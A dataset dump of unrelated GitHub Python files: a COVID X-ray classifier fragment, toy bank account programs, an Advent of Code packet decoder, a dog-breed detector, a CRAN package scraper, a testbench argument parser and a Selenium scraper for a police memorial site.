plt.plot(depth, m4_tr_error, label='Training Error')\n# plt.plot(depth, m4_val_error, label='Validation Error')\n# plt.plot(depth, m4_te_error, label='Test Error')\n# plt.legend()\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Average Error')\n# plt.title(f'Decision Tree Classifier (with {comp} PCA components)')\n# plt.show()\n# if comp == 5:\n# plt.figure()\n# plt.plot(depth, pca_f1_scores)\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Accuracy (F1 Score)')\n# plt.title('Decision Tree Classifier (with 5 PCA components)')\n# plt.show()\n \n# plt.figure()\n# for i in range(len(m4_f1_scores)):\n# plt.plot(depth, m4_f1_scores[i][0], label=f'n={i+4}')\n# plt.legend()\n# plt.xlabel('Tree Depth')\n# plt.ylabel('Accuracy (F1 Score)')\n# plt.title(f'Decision Tree Classifier (with n PCA components)')\n# plt.show()\n\n# print(f'The F1 for Decision Tree is {m3_f1_final}')\n# print(f'The accuracy for kmeans is {m3_accuracy}')\n\ny_train = label_binarize(train_y, classes=[0, 1, 2])\ny_test = label_binarize(test_y, classes=[0, 1, 2])\nn_classes = 3\n\n# # # Learn to predict each class against the other\ndt_clf = OneVsRestClassifier(DecisionTreeClassifier(criterion='entropy', max_depth=6))\n\ny_score = dt_clf.fit(train_X, y_train).predict_proba(test_X)\n\n# # Compute ROC curve and ROC area for each class\nfpr = dict()\ntpr = dict()\nroc_auc = dict()\nfor i in range(n_classes):\n fpr[i], tpr[i], _ = roc_curve(y_test[:, i], 
y_score[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n\n# # Compute micro-average ROC curve and ROC area\nfpr[\"micro\"], tpr[\"micro\"], _ = roc_curve(y_test.ravel(), y_score.ravel())\nroc_auc[\"micro\"] = auc(fpr[\"micro\"], tpr[\"micro\"])\n\n\nplt.figure()\nlw = 2\nplt.plot(fpr[2], tpr[2], color='darkorange',\n lw=lw, label='ROC curve (area = %0.2f)' % roc_auc[2])\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.xlabel('False Positive Rate')\nplt.ylabel('True Positive Rate')\nplt.title('ROC Decision Tree')\nplt.legend(loc=\"lower right\")\nplt.show()\n\n\n# In[ ]:\n\n\n# derive class predictions from the one-vs-rest tree above (highest probability wins)\nm3_tree6 = np.argmax(y_score, axis=1)\ntree_labels = pd.concat([test_y, pd.DataFrame(m3_tree6)], axis=1)\ntree_tp_norm = tree_labels[(tree_labels.label==0) & (tree_labels[0]==0)].shape[0]\ntree_fn_norm = tree_labels[(tree_labels.label==0) & (tree_labels[0] != 0)].shape[0]\nsens_tree_norm = tree_tp_norm/(tree_tp_norm + tree_fn_norm)\n\ntree_tn_norm = tree_labels[(tree_labels.label != 0) & (tree_labels[0] != 0)].shape[0]\ntree_fp_norm = tree_labels[(tree_labels.label != 0) & (tree_labels[0] == 0)].shape[0]\nspec_tree_norm = tree_tn_norm/(tree_tn_norm + tree_fp_norm)\n\nprint(f'For NORMAL the sensitivity is {sens_tree_norm}, specificity is {spec_tree_norm}')\n\n\n# In[ ]:\n\n\ntree_tp_pneu = tree_labels[(tree_labels.label==1) & (tree_labels[0]==1)].shape[0]\ntree_fn_pneu = tree_labels[(tree_labels.label==1) & (tree_labels[0] != 1)].shape[0]\nsens_tree_pneu = tree_tp_pneu/(tree_tp_pneu + tree_fn_pneu)\n\ntree_tn_pneu = tree_labels[(tree_labels.label != 1) & (tree_labels[0] != 1)].shape[0]\ntree_fp_pneu = tree_labels[(tree_labels.label != 1) & (tree_labels[0] == 1)].shape[0]\nspec_tree_pneu = tree_tn_pneu/(tree_tn_pneu + tree_fp_pneu)\n\nprint(f'For PNEUMONIA the sensitivity is {sens_tree_pneu}, specificity is {spec_tree_pneu}')\n\n\n# In[ ]:\n\n\ntree_tp_covid = tree_labels[(tree_labels.label==2) & (tree_labels[0]==2)].shape[0]\ntree_fn_covid = tree_labels[(tree_labels.label==2) & (tree_labels[0] != 2)].shape[0]\nsens_tree_covid = tree_tp_covid/(tree_tp_covid + tree_fn_covid)\n\ntree_tn_covid = tree_labels[(tree_labels.label != 2) & (tree_labels[0] != 2)].shape[0]\ntree_fp_covid = tree_labels[(tree_labels.label != 2) & (tree_labels[0] == 2)].shape[0]\nspec_tree_covid = tree_tn_covid/(tree_tn_covid + tree_fp_covid)\n\nprint(f'For COVID the sensitivity is {sens_tree_covid}, specificity is {spec_tree_covid}')\n\n\n# In[ ]:\n\n\nsns.heatmap(correlation_matrix)\ncorrelation_matrix\n\n\n# In[ ]:\n\n\n# decision_tree = DecisionTreeClassifier(criterion='entropy', max_depth=i, random_state=0)\n\n\n# kf = KFold(n_splits=5)\n# kf.get_n_splits(train_X)\n# X = np.array(train_X)\n# y = np.array(train_y)\n# for train_index, valid_index in kf.split(X):\n# X_train, X_valid = X[train_index], X[valid_index]\n# y_train, y_valid = y[train_index], y[valid_index]\n# decision_tree = decision_tree.fit(X_train, y_train)\n# plt.figure()\n# plot_roc_curve(decision_tree, test_X, test_y)\n# plt.show()\n\n# # plt.figure()\n# # plot_roc_curve()\n# # plt.show()\n\n\n# In[ ]:\n\n\ntest = label_binarize(test_y, classes=[0, 1, 2])\ntest\n\n","repo_name":"deantgao/covid_xray_classification","sub_path":"covid_classification.py","file_name":"covid_classification.py","file_ext":"py","file_size_in_byte":21427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2291267167","text":"from abc import ABC, abstractmethod\r\n\r\nclass Account(ABC):\r\n def __init__(self, balance=0):\r\n 
self.balance = balance\r\n\r\n @abstractmethod\r\n def deposit(self, amount):\r\n pass\r\n\r\n @abstractmethod\r\n def withdraw(self, amount):\r\n pass\r\n\r\n def get_balance(self):\r\n return self.balance\r\n\r\nclass CheckingAccount(Account):\r\n def __init__(self, balance=0):\r\n super().__init__(balance)\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n\r\n def withdraw(self, amount):\r\n if self.balance - amount >= 0:\r\n self.balance -= amount\r\n else:\r\n print(\"Insufficient funds\")\r\n\r\nclass SavingsAccount(Account):\r\n def __init__(self, balance=0):\r\n super().__init__(balance)\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n\r\n def withdraw(self, amount):\r\n if self.balance - amount >= 0:\r\n self.balance -= amount\r\n else:\r\n print(\"Insufficient funds\")\r\n\r\nclass BusinessAccount(Account):\r\n def __init__(self, balance=0):\r\n super().__init__(balance)\r\n\r\n def deposit(self, amount):\r\n self.balance += amount\r\n\r\n def withdraw(self, amount):\r\n if self.balance - amount >= 0:\r\n self.balance -= amount\r\n else:\r\n print(\"Insufficient funds\")\r\n\r\ndef main():\r\n checking = CheckingAccount(1000)\r\n savings = SavingsAccount(5000)\r\n business = BusinessAccount(10000)\r\n\r\n while True:\r\n print(\"1. Checking Account\")\r\n print(\"2. Savings Account\")\r\n print(\"3. Business Account\")\r\n print(\"4. Exit\")\r\n choice = int(input(\"Enter your choice: \"))\r\n if choice == 1:\r\n print(\"1. Deposit\")\r\n print(\"2. Withdraw\")\r\n ch = int(input(\"Enter your choice: \"))\r\n amount = float(input(\"Enter amount: \"))\r\n if ch == 1:\r\n checking.deposit(amount)\r\n elif ch == 2:\r\n checking.withdraw(amount)\r\n elif choice == 2:\r\n print(\"1. Deposit\")\r\n print(\"2. Withdraw\")\r\n ch = int(input(\"Enter your choice: \"))\r\n amount = float(input(\"Enter amount: \"))\r\n if ch == 1:\r\n savings.deposit(amount)\r\n elif ch == 2:\r\n savings.withdraw(amount)\r\n elif choice == 3:\r\n print(\"1. Deposit\")\r\n print(\"2. 
Withdraw\")\r\n ch = int(input(\"Enter your choice: \"))\r\n amount = float(input(\"Enter amount: \"))\r\n if ch == 1:\r\n business.deposit(amount)\r\n elif ch == 2:\r\n business.withdraw(amount)\r\n elif choice == 4:\r\n break\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"rishavasitis/Miniproject","sub_path":"Bank_account_manager.py","file_name":"Bank_account_manager.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10591342865","text":"import utils\nfrom functools import reduce\nfrom operator import add, mul, gt, lt, eq\n\nDAY = 16\n\nOPERATIONS = [ add, mul, min, max, None, gt, lt, eq ]\n\n\ndef decode_value(string :str) -> tuple:\n \"\"\"returns decimal value and length of string consumed\"\"\"\n s = \"\"\n consumed = 0\n while string[consumed] == \"1\": # part A and B of value (if present)\n s += string[consumed+1 : consumed+5]\n consumed = consumed + 5\n s += string[consumed+1 : consumed+5] # part C of value (end of packet)\n return int(s, 2), consumed + 5\n\n\ndef decode(string :str) -> dict:\n \"\"\"returns a packet as a dictionary\"\"\"\n p_version = int(string[:3], 2)\n p_type = int(string[3:6], 2)\n p_length = 6\n p_value= None\n p_operation = OPERATIONS[p_type]\n p_subpackets = []\n \n if p_type == 4: # value packet\n p_value, length = decode_value(string[6 :])\n p_length += length\n \n else: # operation packet\n p_length_type = string[6]\n\n if p_length_type == \"0\": # subpackets defined by length of string\n sub_p_length = int(string[7:22], 2)\n p_length += 16\n while p_length - 22 < sub_p_length:\n p = decode(string[p_length :])\n p_subpackets.append(p)\n p_length += p[\"length\"]\n \n else: # subpackets defined by number of subpackets\n sub_p_num = int(string[7:18], 2)\n p_length += 12\n while sub_p_num > 0:\n p = decode(string[p_length :])\n p_subpackets.append(p)\n p_length += p[\"length\"]\n sub_p_num -= 1\n\n return {\n \"version\": p_version,\n \"type\" : p_type,\n \"subpackets\" : p_subpackets,\n \"operation\" : p_operation,\n \"value\" : p_value,\n \"length\" : p_length,\n }\n\n\ndef sum_versions(packet :dict) -> int:\n tot = packet[\"version\"]\n for p in packet[\"subpackets\"]:\n tot += sum_versions(p)\n return tot\n\n\ndef compute(packet :dict) -> int:\n if not packet[\"subpackets\"]:\n return packet[\"value\"]\n\n for p in packet[\"subpackets\"]:\n p[\"value\"] = compute(p)\n\n packet[\"value\"] = reduce( packet[\"operation\"], map(lambda p : p[\"value\"], packet[\"subpackets\"]) )\n\n return packet[\"value\"]\n\n\nmessage_hex = utils.read_input(DAY)[0]\nmessage_dec = int(message_hex, 16)\nmessage_bin = format(message_dec, f'0>{len(message_hex)*4}b')\npacket_hierarchy = decode(message_bin)\n\n# part 1\nutils.print_answer(1, sum_versions(packet_hierarchy))\n# part 2\nutils.print_answer(2, compute(packet_hierarchy))","repo_name":"piro-97/AdventOfCode","sub_path":"2021/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28544238595","text":"from extract_bottleneck_features import extract_Xception\r\nimport re\r\nimport numpy as np\r\nimport cv2 \r\n\r\nfrom keras.preprocessing import image \r\nfrom keras.applications.resnet50 import ResNet50\r\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\r\nfrom keras.models import load_model\r\n\r\n\r\ndef path_to_tensor(img_path):\r\n \r\n '''\r\n 
Function takes a string-valued file path to \r\n a color image as input and returns a 4D tensor suitable for supplying \r\n to a Keras CNN.\r\n Parameters:\r\n img_path (string): file path to a color image\r\n Returns:\r\n (numpy array): 4D tensor for the input image\r\n '''\r\n # loads RGB image as PIL.Image.Image type\r\n img = image.load_img(img_path, target_size=(224, 224))\r\n # convert PIL.Image.Image type to 3D tensor with shape (224, 224, 3)\r\n x = image.img_to_array(img)\r\n # convert 3D tensor to 4D tensor with shape (1, 224, 224, 3) and return 4D tensor\r\n return np.expand_dims(x, axis=0)\r\n\r\ndef face_detector(img_path):\r\n '''\r\n Function returns \"True\" if a face is detected in the image stored at img_path. \r\n Parameters:\r\n img_path (string): path to the image\r\n Returns: \r\n (boolean): \"True\" if face is detected, \"False\" otherwise\r\n '''\r\n face_cascade = cv2.CascadeClassifier('haarcascades/haarcascade_frontalface_alt.xml')\r\n img = cv2.imread(img_path)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces = face_cascade.detectMultiScale(gray)\r\n return len(faces) > 0\r\n\r\ndef ResNet50_predict_labels(img_path):\r\n '''\r\n Function that returns the prediction for the input image according to \r\n one of the 1000 categories in ResNet50.\r\n Parameters:\r\n img_path(string): path to the input image\r\n Returns:\r\n (integer): integer corresponding to the model's predicted object\r\n class \r\n '''\r\n ResNet50_model = ResNet50(weights=\"imagenet\")\r\n # returns prediction vector for image located at img_path \r\n img = preprocess_input(path_to_tensor(img_path))\r\n return np.argmax(ResNet50_model.predict(img))\r\n\r\ndef dog_detector(img_path):\r\n '''\r\n Function returns \"True\" if a dog is detected in the image stored at img_path. \r\n Parameters:\r\n img_path (string): path to the image\r\n Returns: \r\n (boolean): \"True\" if dog is detected, \"False\" otherwise\r\n '''\r\n prediction = ResNet50_predict_labels(img_path)\r\n # ImageNet categories 151-268 are dog breeds\r\n return ((prediction <= 268) & (prediction >= 151)) \r\n\r\n\r\ndef get_dog_names():\r\n '''\r\n Function that returns dog breed names from the saved file\r\n '''\r\n # define an empty list\r\n dog_names = []\r\n\r\n # open file and read the content in a list\r\n with open('dog_names.txt', 'r') as filehandle:\r\n for line in filehandle:\r\n # remove linebreak which is the last character of the string\r\n currentPlace = line[:-1]\r\n\r\n # add item to the list\r\n dog_names.append(currentPlace)\r\n \r\n return dog_names\r\n\r\ndef predict_breed(img_path):\r\n '''\r\n Function that takes a path to an image as input\r\n and returns the dog breed that is predicted by the model.\r\n Parameters:\r\n img_path (string): path to the input image\r\n Returns:\r\n (string): predicted dog breed\r\n '''\r\n #Load model\r\n Xception_model = load_model(\"saved_models/Xception_model\")\r\n # extract bottleneck features\r\n bottleneck_feature = extract_Xception(path_to_tensor(img_path))\r\n # obtain predicted vector\r\n predicted_vector = Xception_model.predict(bottleneck_feature)\r\n #get dog breed names\r\n dog_names = get_dog_names()\r\n # assign dog breed that is predicted by the model \r\n dog_breed = dog_names[np.argmax(predicted_vector)]\r\n # strip the numeric prefix (everything up to the first '.') and return the breed\r\n return dog_breed[re.search(r'\\.', dog_breed).span()[1]:]\r\n\r\ndef dog_breed_detector(img_path):\r\n '''\r\n Detect the dog breed for an input image of a human or a dog; if neither is\r\n detected, return a message asking for another photo.
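\r\n\r\n Example (path and output are illustrative, not from the repository):\r\n >>> dog_breed_detector('images/sample_dog.jpg')\r\n 'Labrador_retriever'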
\r\n Parameters:\r\n img_path (string): input image path\r\n Returns:\r\n (string): the predicted breed, or a message if neither a human nor a dog is found\r\n '''\r\n \r\n if face_detector(img_path) > 0:\r\n return(predict_breed(img_path))\r\n \r\n elif dog_detector(img_path) > 0:\r\n return(predict_breed(img_path))\r\n \r\n else:\r\n return(\"Please provide an additional photo. Neither a human nor a dog was detected.\")","repo_name":"doroslava/Dog_breed_detector","sub_path":"dog-app/detectors.py","file_name":"detectors.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38191762377","text":"import sqlite3\nimport random\n\ndef sql():\n conn = sqlite3.connect('card.s3db')\n c = conn.cursor()\n c.execute('''CREATE TABLE IF NOT EXISTS card (\n id INTEGER NOT NULL, \n number TEXT NOT NULL, \n pin TEXT NOT NULL, \n balance INTEGER DEFAULT 0)''')\n conn.commit()\n return conn, c\n\nconn, c = sql()\n\nc.execute('SELECT * FROM card')\n\nclass Menus:\n def main(self):\n print('''1. Create an account\n2. Log into account\n0. Exit''')\n\n num = int(input())\n return num\n\n def log(self):\n print('''1. Balance\n2. Add income\n3. Do transfer\n4. Close account\n5. Log out\n0. Exit''')\n\n num = int(input())\n return num\n\ndef luhn_algorithm(number):\n total = 0\n new_number = []\n for i, num in enumerate(number, start=1):\n num = int(num)\n if i % 2 != 0:\n num = num * 2\n if num > 9:\n num = num - 9\n\n new_number.append(str(num))\n\n for i in new_number:\n total += int(i)\n\n # valid numbers have a checksum divisible by 10\n return total % 10 == 0\n\ndef make_card():\n IIN = '400000'\n c.execute('''SELECT id FROM card''')\n # fetchall() returns 1-tuples, so unpack them for the membership test below\n all_ids = [row[0] for row in c.fetchall()]\n while True:\n card_num = IIN + \"%010d\" % random.randint(0, 9999999999)\n new_id = int(\"%08d\" % random.randint(0, 99999999))\n if luhn_algorithm(card_num) and (new_id not in all_ids):\n break\n\n card_pin = \"%04d\" % random.randint(0,9999)\n c.execute('''INSERT INTO card (id, number, pin) \n VALUES (?, ?, ?)''', (new_id, card_num, card_pin))\n conn.commit()\n return card_num, card_pin\n\n# All account choices for managing an account\nclass AccountChoices:\n def __init__(self, number, pin):\n self.card_number = number\n self.pin = pin\n self.balance = 0\n self.info = None\n self.add_money = None\n\n # Checks credentials and logs into account\n def login(self):\n c.execute('''SELECT * FROM card\n WHERE number = ? AND pin = ?''', (self.card_number, self.pin))\n self.info = c.fetchone()\n return self.info\n\n # Displays money for account\n def display_balance(self):\n self.balance = self.info[-1]\n print('\\nBalance: ' + str(self.balance) + '\\n')\n\n def add_income(self, money, acc=None):\n if acc:\n c.execute(\"\"\"UPDATE card \n SET balance = balance + ?\n WHERE number = ?\"\"\", (money, acc))\n\n c.execute(\"\"\"UPDATE card \n SET balance = balance - ?\n WHERE number = ?\"\"\", (money, self.card_number))\n\n else:\n c.execute(\"\"\"UPDATE card \n SET balance = balance + ?\n WHERE number = ?\"\"\", (money, self.card_number))\n\n conn.commit()\n self.login()\n\n def transfer_money(self):\n self.balance = self.info[-1]\n list_cards = []\n c.execute(\"SELECT number FROM card\")\n all_cards = c.fetchall()\n for tups in all_cards:\n for card in tups:\n list_cards.append(card)\n\n transfer_account = input('Enter card number:\\n')\n if transfer_account == self.card_number:\n print(\"You can't transfer money to the same account!\\n\")\n elif not luhn_algorithm(transfer_account):\n print('You probably made a mistake in the card number. 
Please try again!\\n')\n elif transfer_account not in list_cards:\n print('Such a card does not exist.\\n')\n else:\n transfer_amount = input('Enter how much money you want to transfer:\\n')\n if int(transfer_amount) > self.balance:\n print('Not enough money!\\n')\n else:\n self.add_income(transfer_amount, transfer_account)\n print('Success!\\n')\n\n def close_account(self):\n current_card = (self.card_number,)\n c.execute(\"DELETE FROM card WHERE number = ?\", current_card)\n conn.commit()\n\nwhile True:\n user_num = Menus().main()\n print()\n\n if user_num == 1:\n print('Your card has been created')\n user_card, user_pin = make_card()\n print(f'Your card number:\\n{user_card}')\n print(f'Your card PIN:\\n{user_pin}\\n')\n continue\n\n elif user_num == 2:\n user_card = input('Enter your card number:\\n')\n user_pin = input('Enter your PIN:\\n')\n account = AccountChoices(user_card, user_pin)\n account_info = account.login()\n if account_info:\n print('You have successfully logged in!\\n')\n\n while True:\n user_num = Menus().log()\n if user_num == 1:\n # For balance\n account.display_balance()\n\n elif user_num == 2:\n # for adding money\n income = input('\\nEnter income:\\n')\n account.add_income(income)\n\n elif user_num == 3:\n # Transfer money\n print('\\nTransfer')\n account.transfer_money()\n\n elif user_num == 4:\n account.close_account()\n print('The account has been closed!\\n')\n break\n\n elif user_num == 5:\n print('Logging out...\\n')\n break\n\n elif user_num == 0:\n print('Bye!')\n exit()\n\n else:\n print('Not one of the choices\\n')\n\n else:\n print('Wrong card number or PIN!\\n')\n\n else:\n print('Bye!')\n break\nconn.close()\n","repo_name":"Dibichi/Jetbrains-Academy-Python","sub_path":"Medium/banking.py","file_name":"banking.py","file_ext":"py","file_size_in_byte":5555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10058459072","text":"# scrape down the R CRAN PACKAGE list:\nfrom bs4 import BeautifulSoup\nimport requests\n\nr = requests.get(\n 'https://cran.r-project.org/web/packages/available_packages_by_name.html')\nt = r.text.encode('utf-8')\nsoup = BeautifulSoup(t, 'html.parser')\nfor row in soup.body.table.findAll('tr'):\n cols = row.findAll('td')\n if len(cols) == 0:\n continue\n # print(len(cols))\n # print(cols)\n a = cols[0].find('a')\n if a:\n print(a.contents[0])\n","repo_name":"ssc-oscar/eco-network","sub_path":"code/scrape_downR_CRAN_pack_name.py","file_name":"scrape_downR_CRAN_pack_name.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70870765813","text":"from ast import parse\nimport pathlib \nimport random\nfrom datetime import datetime\nimport argparse\nimport sys\n\n\n# Colors \n###########################################################\nTRED = '\\33[91m'\nBRED = '\\33[41m'\nTWarning = '\\33[93m'\nBWarning = '\\33[43m'\nTSuccess = '\\33[92m'\nBSuccess = '\\33[42m'\nTPrim = '\\33[94m'\nBPrim = '\\33[44m'\nTEND = '\\33[0m' \n###########################################################\n\n# Create the parser\n###########################################################\nmy_parser = argparse.ArgumentParser(fromfile_prefix_chars='@', add_help=False)\n\n# T/F 
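arguments\n# Note: fromfile_prefix_chars='@' lets argparse read extra arguments straight from a\n# file (\"python run.py @argfile\", one token per line); the manual params-file parsing\n# further below re-implements the same idea by hand.\n\n# T/F 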
arguments\nmy_parser.add_argument('--comp_only',action=\"store_true\")\nmy_parser.add_argument('--tb_only',action=\"store_true\")\nmy_parser.add_argument('--design_only',action=\"store_true\")\nmy_parser.add_argument('--gui',action=\"store_true\")\n\n# Input arguments\nmy_parser.add_argument('--sim_only',type=str)\nmy_parser.add_argument('-t','--test',type=str, required=True)\nmy_parser.add_argument('-c','--collection',type=str, required=True)\n\n\nargs_command = my_parser.parse_args()\n###########################################################\n\n## Required\n###########################################################\nTestName = args_command.test\ncollectName = args_command.collection\n\n## Dirs\nRootDir = str((pathlib.Path(__file__).parent / \"../../\").resolve())\nRtlDir = f\"{RootDir}/rtl\" \nTBDir = f\"{RootDir}/tb/verif\" \nTBSimpleDir= f\"{RootDir}/tb/simple\" \nEnvDir = f\"{RootDir}/tb/environments/{collectName}\" \nEnvDefDir = f\"{RootDir}/tb/environments/default\"\nTestSVDir = f\"{RootDir}/tb/tests/{collectName}/{TestName}/sv\" \nTestDir = f\"{RootDir}/tb/tests/{collectName}/{TestName}\" \n###########################################################\n\n## Add Arguments from file to command\n###########################################################\nparsed_args = sys.argv[1:]\nwith open(f'{EnvDefDir}/params/run_params', 'r') as f:\n for line in f:\n if line[0] not in (\"#\", \"\\n\", \" \"):\n print(\"_\" + line + \"_\")\n line = line.replace(\"\\n\", \"\")\n parsed_args.append(line)\nwith open(f'{EnvDir}/params/run_params', 'r') as f:\n for line in f:\n if line[0] not in (\"#\", \"\\n\", \" \"):\n print(\"_\" + line + \"_\")\n line = line.replace(\"\\n\", \"\")\n parsed_args.append(line)\nwith open(f'{TestDir}/params/run_params', 'r') as f:\n for line in f:\n if line[0] not in (\"#\", \"\\n\", \" \"):\n print(\"_\" + line + \"_\")\n line = line.replace(\"\\n\", \"\")\n parsed_args.append(line) \n\nprint(parsed_args)\nargs_command = my_parser.parse_args(parsed_args)\n\n# print(\"Here are list of Arguments\")\n# print(args_command)\n###########################################################\n\n\n## Variables \n###########################################################\n\n\n## Command Args \n\n\n## Command Args\nGUI_on = int(args_command.gui)\ncomp_only = int(args_command.comp_only)\nsim_only = args_command.sim_only\nDesignOnly = args_command.design_only or args_command.test == \"no_test\"\nTBOnly = args_command.tb_only\nSimpleTB = int(args_command.test == \"no_test\")\nDesignTB = not (DesignOnly or TBOnly)\n\n## Editable Args \ndebug = \"+acc+/tb/dut\"\n\n# Generate Run Dir based on the seed and date time\nSeed = str(round(random.uniform(1111.11, 9999999.99), 2))\nnow = datetime.now()\ndt_string = now.strftime(\"%Y%m%d_%H%M\")\n\nif sim_only: \n RunDir = RootDir + \"/tb/sim/\" + sim_only\nelse: \n RunDir = RootDir + \"/tb/sim/\" + TestName + \"_\" + dt_string + \"_\" + Seed\n\n###########################################################\n\nif GUI_on == 0: \n GUI = \"-c\"\nelif GUI_on == 1:\n GUI = \"-gui\"\n\n# Contents: \n# - Compilation \n# - Optimization \ntbTop = \"tb\"\n# - Simulation \n\n\n\n\n\"\"\" \nSome Arguments: \n- comp_args \n- sim_args \n- opt_args \n- design_only \n- tb_only \n- comp_only \n- sim_only\n- gui \n- dump_size \n- dump \n- do_file\n- t: 
test\n\"\"\"\n","repo_name":"a7med7asan15/usb_phy_verif","sub_path":"tb/bin/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"28283182680","text":"import os\nfrom glob import glob\n#grab all of the files in a directory and put them in a list\nfrom pprint import pprint as pp\n#prints pretty\nimport csv\nimport json\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom time import sleep\nfrom pyquery import PyQuery as pq\n\n\n#We need 51 separate URLS for this one. Queries need to be constructed like this: q=%22New+York%22&page=0\n#Note, the search function is very loose and when you type Washington, it also returns people with the last name Washington. It doesn't actually pay attention to location\n#However, you can clean the data later and drop duplicates if this query/download method doesn't just update an existing file down the road\n\n# Note: when viewing the search result pages, the HTML only displays 20 pages for results. You can go past page 20 by manually changing the page number in the URL, making it difficult to actually know how many pages there are in the scrape. We'll default to 1000 to make sure we get everything\n\n# Note: when combing through the pages, the http GET structure starts with page=0 (think how Python handles indices)\nbaseurl = ['http://names.lawmemorial.org/search.html#q=']\n\n#Similar to script used on the Officer Down Memorial Page, collecting same data, basically\n#list of states\nstates = ['Alabama','Alaska','Arizona','Arkansas','California','Colorado', 'Connecticut','Delaware','Florida','Georgia','Hawaii','Idaho', 'Illinois','Indiana','Iowa','Kansas','Kentucky','Louisiana', 'Maine' 'Maryland','Massachusetts','Michigan','Minnesota', 'Mississippi', 'Missouri','Montana','Nebraska','Nevada', 'New Hampshire','New Jersey','New Mexico','New York', 'North Carolina','North Dakota','Ohio', 'Oklahoma','Oregon','Pennsylvania','Rhode Island', 'South Carolina','South Dakota','Tennessee','Texas','Utah', 'Vermont','Virginia','Washington','West Virginia', 'Wisconsin','Wyoming', 'Washington D.C.', 'Puerto Rico', 'Guam']\n#empty state list that will be appended to add %22 to beginning and ending of each state because that's the boolean notation in the url to match exact phrase\nstates2 = []\n# Append each state to the baseurl and add to a list\nstateurl = []\n# URLs to scrape\nurls = []\n# Search URL: http://names.lawmemorial.org/search.html#q=\n# FULL SEARCH URL: http://names.lawmemorial.org/search.html#q=%22New+York%22&page=0\n\n# We'll want to use sleep(INTEGER) so we don't DDOS the the website\n\n#The site's search function doesn't work properly via blanket GET request.\n#Need to use Selenium to load the HTML and then save it. Get request links later for data\ndriver = webdriver.Firefox()\n\n#function that runs a For loop to generate the URLs to scrape. 
#Function that runs a for loop to generate the URLs to scrape. Save these to a JSON file for easier scraping later\ndef statelist():\n\n\tfor x in states: \n\t\tupdate = '\"' + x + '\"'\n\t\t# replace = x.replace(' ', '+')\n\t\t# update = '%22' + replace + '%22'\n\t\tstates2.append(update)\n\tfor url in baseurl:\n\t\tfor string in states2:\n\t\t\tnewurl = url + string\n\t\t\tstateurl.append(newurl)\n\ndef urllist():\n\tfor urlstate in stateurl:\n\t\tfor x in range(0, 351, 1):\n\t\t\tnewurl = urlstate + '&page=' + str(x)\n\t\t\turls.append(newurl)\n\n# function to write the urls list variable to a local json file for scraping. Run this to save the data locally for posterity. \ndef urls_to_json(url_list, name):\n\twith open(name + '.json', 'w') as outfile:\n\t\tjson.dump(url_list, outfile)\n\n# function to download html of search pages to local directory, also sets the naming\n#Requests won't work on this page, will need to do selenium && request\ndef run(state):\n\tprint('opening page')\n\tdriver.get(\"http://names.lawmemorial.org/search.html?q=\")\n\tsleep(2)\n\tdriver.find_element_by_name(\"query\").send_keys(state)\n\tdriver.find_element_by_class_name(\"query-submit\").click()\n\tprint('query submitted')\n\tsleep(3)\n\thtml = driver.page_source\n\t# name the file after the state and save the rendered page source\n\tname = state.strip('\"').replace(' ', '_') + '.html'\n\twith open('nleo_mem_fund_search/' + name, 'w', encoding='utf8') as file:\n\t\tfile.write(html)\n\t\tprint('wrote file: ' + name)\n\t# print(html)\n\n\n\t# r = requests.get(url)\n\t# # Declare naming convention. In this case, it will be named using the url contents after the '?'\n\t\n\t#name= 'query'\n\t# class_name= 'query-submit'\n\n\t# name = url.split('/')[-1].split('#')[-1] + '.html'\n\t# with open('nleo_mem_fund_search/' + name, 'w', encoding='utf8') as file:\n\t# \t# If you don't include the encoding parameter, you'll run into an error eventually\n\t# \tfile.write(r.text)\n\t# \tprint('wrote file: ' + str(name))\n\n\n\n#Create list of URLs to scrape\nstatelist()\n#Check to see that query construction worked\n# pp(states2)\n# pp(stateurl)\n\n# call url list construction function\nurllist()\n# pp(urls)\n# pp(len(urls))\n\n\n#Run the function that saves the urls to a local json file\n# urls_to_json(stateurl, 'lawmemorial_links')\n# urls_to_json(urls, 'all_law_mem_links')\n\n#Call 'run' function, use sleep so we don't get blocked\n# for state in states2:\n# \trun(state)\n# \tprint('Saved page')\n# \tsleep(4)\n\nrun(states2[0])\n#Call 'run' function for a specific URL index range, useful if an error is thrown during your scraping. \n# for url in urls[462:]:\n# \trun(url)\n# \tprint('Saved page')\n# \tsleep(4)\n\n# If your code throws an error during the scraping, search for the last file written (it'll probably be incomplete)\n# Grab the name of that incomplete file, add the full URL, run this print command to get the index position of where you left off.
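# A resume sketch built on that index (LAST_SAVED_URL is a placeholder for whatever\n# link you recover from the incomplete file):\n#   start = urls.index(LAST_SAVED_URL)\n#   for url in urls[start:]:\n#   \trun(url)\n#   \tsleep(4)\n# 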
